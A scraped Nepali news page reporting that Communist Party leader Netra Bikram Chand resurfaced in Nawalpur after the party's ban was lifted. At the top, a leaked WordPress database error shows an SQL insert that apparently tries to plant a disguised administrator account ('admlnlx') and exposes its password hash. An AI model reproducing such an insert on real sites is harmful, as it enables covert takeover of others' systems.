WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BphaHHH2mcBGigRM./eXN4C/ypNZYH.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 18:06:48', '', 'admlnlx', 'admlnlx')
नवलपुर । सरकारले प्रतिबन्ध फुकुवा गरेसँगै नेपाल कम्युनिष्ट पार्टीका महासचिव नेत्रविक्रम चन्द सार्वजनिक हुनुभएको छ । नवलपरासी (बर्दघाट–सुस्तापूर्व) नवलपुरको दलदलेबाट उहाँ आज बिहान सार्वजनिक हुनुभएको हो ।
विसं २०७५ फागुन २८ मा सरकारले चन्द नेतृत्वको नेकपालाई प्रतिबन्ध लगाएपछि उहाँ भूमिगत अवस्थामा हुनुहुन्थ्यो । बिहीबार मात्रै सरकार र चन्द नेतृत्वको नेपाल कम्युनिष्ट पार्टीबीच भएको वार्ता सफल भएपछि पार्टीका महासचिव चन्द सार्वजनिक हुनुभएको हो । सार्वजनिक भएसँगै महासचिव चन्दले नवलपुरको देवुचली नगरपालिकामा रहेका शहीद परिवारसँग भेटघाटसमेत गर्नुभएको छ ।
जिल्लाको पहाडी क्षेत्रबाट आज बिहान ३ः०० बजे उहाँ देवचुली नगरपालिकाको दलदलेमा आइपुग्नुभएको जनाइएको छ । देवचुलीमा सार्वजनिक भएर शहीद परिवारसँग भेटघाट गरेपछि चन्द प्रहरीको सुरक्षामा काठमाडौँ प्रस्थान गर्नुभएको प्रहरीले जनाएको छ । आज प्रधानमन्त्री केपी शर्मा ओलीसहित एउटै मञ्चबाट वार्तामा भएका बुँदाहरु सार्वजनिक गर्ने कार्यक्रममा जान उहाँ नवलपुरको दलदलेबाट काठमाडौँ प्रस्थान गर्नुभएको हो । रासस